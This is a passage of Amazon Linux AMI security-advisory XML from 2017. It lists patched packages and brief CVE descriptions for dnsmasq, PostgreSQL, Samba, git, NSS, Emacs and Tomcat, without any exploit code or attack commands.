</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14491" title="" id="CVE-2017-14491" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14492" title="" id="CVE-2017-14492" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14493" title="" id="CVE-2017-14493" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14494" title="" id="CVE-2017-14494" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14495" title="" id="CVE-2017-14495" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14496" title="" id="CVE-2017-14496" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dnsmasq-utils" version="2.76" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-utils-2.76-2.14.amzn1.x86_64.rpm</filename></package><package name="dnsmasq-debuginfo" version="2.76" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-debuginfo-2.76-2.14.amzn1.x86_64.rpm</filename></package><package name="dnsmasq" version="2.76" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-2.76-2.14.amzn1.x86_64.rpm</filename></package><package name="dnsmasq" version="2.76" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-2.76-2.14.amzn1.i686.rpm</filename></package><package name="dnsmasq-debuginfo" version="2.76" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-debuginfo-2.76-2.14.amzn1.i686.rpm</filename></package><package name="dnsmasq-utils" version="2.76" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-utils-2.76-2.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-908</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-908: medium priority package update for postgresql96</title><issued date="2017-10-06 16:51:00" /><updated date="2017-10-10 20:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7547:
An authorization flaw was found in the way PostgreSQL handled access to the pg_user_mappings view on foreign servers. A remote, authenticated attacker could potentially use this flaw to retrieve passwords from the user mappings defined by the foreign server owners without actually having the privileges to do so.
An authorization flaw was found in the way PostgreSQL handled access to the pg_user_mappings view on foreign servers. A remote authenticated attacker could potentially use this flaw to retrieve passwords from the user mappings defined by the foreign server owners without actually having the privileges to do so.
1477185:
CVE-2017-7547 postgresql: pg_user_mappings view discloses passwords to users lacking server privileges
CVE-2017-7546:
It was found that authenticating to a PostgreSQL database account with an empty password was possible despite libpq&#039;s refusal to send an empty password. A remote attacker could potentially use this flaw to gain access to database accounts with empty passwords.
1477184:
CVE-2017-7546 postgresql: Empty password accepted in some authentication methods
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7546" title="" id="CVE-2017-7546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7547" title="" id="CVE-2017-7547" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql96-devel" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-devel-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-debuginfo-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython26-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-docs" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-docs-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-libs" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-libs-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plperl-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-test-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython27-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-static" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-static-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-contrib" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-contrib-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-server" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-server-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96" version="9.6.4" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-9.6.4-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-test-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-debuginfo-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-devel" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-devel-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-plperl" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plperl-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython26-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-docs" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-docs-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-server" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-server-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-contrib" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-contrib-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-static-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-libs" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-libs-9.6.4-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.4" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython27-9.6.4-1.77.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-909</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-909: medium priority package update for samba</title><issued date="2017-10-12 19:37:00" /><updated date="2017-10-13 00:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12163:
An information leak flaw was found in the way SMB1 protocol was implemented by Samba. A malicious client could use this flaw to dump server memory contents to a file on the samba share or to a shared printer, though the exact area of server memory cannot be controlled by the attacker.
1491206:
CVE-2017-12163 Samba: Server memory information leak over SMB1
CVE-2017-12151:
A flaw was found in the way samba client used encryption with the max protocol set as SMB3. The connection could lose the requirement for signing and encrypting to any DFS redirects, allowing an attacker to read or alter the contents of the connection via a man-in-the-middle attack.
1488197:
CVE-2017-12151 samba: SMB2 connections don't keep encryption across DFS redirects
CVE-2017-12150:
It was found that samba did not enforce &quot;SMB signing&quot; when certain configuration options were enabled. A remote attacker could launch a man-in-the-middle attack and retrieve information in plain-text.
1488400:
CVE-2017-12150 samba: Some code path don't enforce smb signing, when they should
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12150" title="" id="CVE-2017-12150" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12151" title="" id="CVE-2017-12151" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12163" title="" id="CVE-2017-12163" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ctdb-tests" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.6.2" release="11.36.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.6.2-11.36.amzn1.noarch.rpm</filename></package><package name="samba-libs" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.6.2" release="11.36.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.6.2-11.36.amzn1.noarch.rpm</filename></package><package name="samba-python" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.6.2" release="11.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.6.2-11.36.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.6.2-11.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-910</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-910: medium priority package update for git</title><issued date="2017-10-12 19:39:00" /><updated date="2022-12-15 17:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-14867:
Git before 2.10.5, 2.11.x before 2.11.4, 2.12.x before 2.12.5, 2.13.x before 2.13.6, and 2.14.x before 2.14.2 uses unsafe Perl scripts to support subcommands such as cvsserver, which allows attackers to execute arbitrary OS commands via shell metacharacters in a module name. The vulnerable code is reachable via git-shell even without CVS support.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14867" title="" id="CVE-2017-14867" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-all" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.13.6" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.13.6-1.55.amzn1.x86_64.rpm</filename></package><package name="git-p4" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="git" version="2.13.6" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.13.6-1.55.amzn1.x86_64.rpm</filename></package><package name="git-email" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.13.6" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.13.6-1.55.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.13.6" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.13.6-1.55.amzn1.x86_64.rpm</filename></package><package name="git-cvs" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.13.6" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.13.6-1.55.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.13.6" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.13.6-1.55.amzn1.i686.rpm</filename></package><package name="git" version="2.13.6" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.13.6-1.55.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.13.6" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.13.6-1.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-911</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-911: important priority package update for nss</title><issued date="2017-10-12 19:41:00" /><updated date="2017-10-13 00:10:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7805:
A use-after-free flaw was found in the TLS 1.2 implementation in the NSS library when client authentication was used. A malicious client could use this flaw to cause an application compiled against NSS to crash or, potentially, execute arbitrary code with the permission of the user running the application.
1471171:
CVE-2017-7805 nss: Potential use-after-free in TLS 1.2 server when verifying client authentication
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7805" title="" id="CVE-2017-7805" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-pkcs11-devel" version="3.28.4" release="12.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.28.4-12.80.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.28.4" release="12.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.28.4-12.80.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.28.4" release="12.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.28.4-12.80.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.28.4" release="12.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.28.4-12.80.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.28.4" release="12.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.28.4-12.80.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.28.4" release="12.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.28.4-12.80.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.28.4" release="12.80.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.28.4-12.80.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.28.4" release="12.80.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.28.4-12.80.amzn1.i686.rpm</filename></package><package name="nss" version="3.28.4" release="12.80.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.28.4-12.80.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.28.4" release="12.80.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.28.4-12.80.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.28.4" release="12.80.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.28.4-12.80.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.28.4" release="12.80.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.28.4-12.80.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-912</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-912: important priority package update for emacs</title><issued date="2017-10-12 20:38:00" /><updated date="2017-10-13 00:11:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-14482:
A command injection flaw within the Emacs &quot;enriched mode&quot; handling has been discovered. By tricking an unsuspecting user into opening a specially crafted file using Emacs, a remote attacker could exploit this flaw to execute arbitrary commands with the privileges of the Emacs user.
1490409:
CVE-2017-14482 emacs: command injection flaw within "enriched mode" handling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14482" title="" id="CVE-2017-14482" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="emacs" version="24.3" release="20.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/emacs-24.3-20.22.amzn1.x86_64.rpm</filename></package><package name="emacs-el" version="24.3" release="20.22.amzn1" epoch="1" arch="noarch"><filename>Packages/emacs-el-24.3-20.22.amzn1.noarch.rpm</filename></package><package name="emacs-common" version="24.3" release="20.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/emacs-common-24.3-20.22.amzn1.x86_64.rpm</filename></package><package name="emacs-debuginfo" version="24.3" release="20.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/emacs-debuginfo-24.3-20.22.amzn1.x86_64.rpm</filename></package><package name="emacs-common" version="24.3" release="20.22.amzn1" epoch="1" arch="i686"><filename>Packages/emacs-common-24.3-20.22.amzn1.i686.rpm</filename></package><package name="emacs" version="24.3" release="20.22.amzn1" epoch="1" arch="i686"><filename>Packages/emacs-24.3-20.22.amzn1.i686.rpm</filename></package><package name="emacs-debuginfo" version="24.3" release="20.22.amzn1" epoch="1" arch="i686"><filename>Packages/emacs-debuginfo-24.3-20.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-913</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-913: important priority package update for tomcat8 tomcat80 tomcat7</title><issued date="2017-10-26 16:29:00" /><updated date="2017-10-26 22:56:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12617:
A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution.
1494283:
CVE-2017-12617 tomcat: Remote Code Execution bypass for CVE-2017-12615
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617" title="" id="CVE-2017-12617" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-admin-webapps" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat80" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat80-log4j" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-log4j-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat80-jsp-2.3-api" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-jsp-2.3-api-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat80-admin-webapps" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-admin-webapps-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat80-webapps" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-webapps-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat80-el-3.0-api" version="8.0.47" release="1.78.amzn1" epoch="0" 